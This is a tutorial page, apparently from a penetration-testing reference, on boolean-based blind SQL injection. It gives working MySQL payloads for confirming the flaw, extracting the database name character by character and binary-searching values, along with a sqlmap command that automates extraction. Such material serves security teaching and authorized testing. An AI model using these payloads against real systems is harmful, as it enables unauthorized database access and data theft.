Boolean-Based Blind SQL Injection¶
Boolean-based blind SQLi is an inferential technique used when the application never displays query results or database errors directly. The attacker instead injects a condition into the query and observes which of two distinguishable responses comes back (page renders normally vs. "not found", blank, or error), which reveals whether the condition evaluated to TRUE or FALSE. Repeating this yields one bit of information per request, which is enough to reconstruct arbitrary data.
Methodology¶
The process involves asking the database a series of true/false questions to exfiltrate information one character at a time.
1. Confirm the Vulnerability¶
First, confirm that the application responds differently to a logically true and a logically false condition. The pair of responses you observe here is the oracle that every later question is answered through, so note exactly what distinguishes them (status code, page length, a specific string).
Vulnerable URL: http://example.com/items.php?id=1
- True condition: inject ' AND 1=1-- - so the query's own condition stays true. The page should load normally.
  http://example.com/items.php?id=1' AND 1=1-- -
- False condition: inject ' AND 1=2-- - so the query returns no rows. The page should change (e.g., show an error, "item not found", or return a blank page).
  http://example.com/items.php?id=1' AND 1=2-- -
The leading single quote assumes the parameter is embedded in a quoted string; if it is used as a bare number, omit the quote. In MySQL the -- comment must be followed by whitespace, which is why the payload ends in -- - (or --+ in a URL, where + decodes to a space); # also works but must be sent as %23, since a literal # starts the URL fragment and is never sent to the server.
2. Enumerate Database Information¶
Once confirmed, you can start asking questions about the database.
Check Database Name Length:
```sql
-- Is the length of the database name greater than 5?
' AND (SELECT LENGTH(database())) > 5-- -
```
Extract Database Name (Character by Character): Use the SUBSTRING() function to test each character.
```sql
-- Is the first character of the database name 'a'?
' AND (SELECT SUBSTRING(database(), 1, 1)) = 'a'-- -
-- Is the first character of the database name 'b'?
' AND (SELECT SUBSTRING(database(), 1, 1)) = 'b'-- -
```
These payloads are MySQL-specific (database(), SUBSTRING()); other engines use different names for the same functions. Two practical points: with MySQL's default case-insensitive collations, = 'a' also matches 'A', so compare code points with ASCII(SUBSTRING(...)) instead; and rather than trying every candidate character in turn, compare against a threshold (ASCII(...) > 96) and binary-search, which finds each character in about seven requests instead of up to ninety-five.
3. Automation with sqlmap¶
Manually performing boolean-based blind SQLi is extremely tedious, since every character of every value costs several requests. sqlmap automates the whole process: it detects the injection, picks a response-difference heuristic for the TRUE/FALSE oracle, and binary-searches each character. Restrict it to this technique with --technique=B when you already know the injection is boolean-based and want to avoid noisier probes.
```bash
# sqlmap will automatically detect and exploit boolean-based blind SQLi
sqlmap -u "http://example.com/items.php?id=1" --dbs
```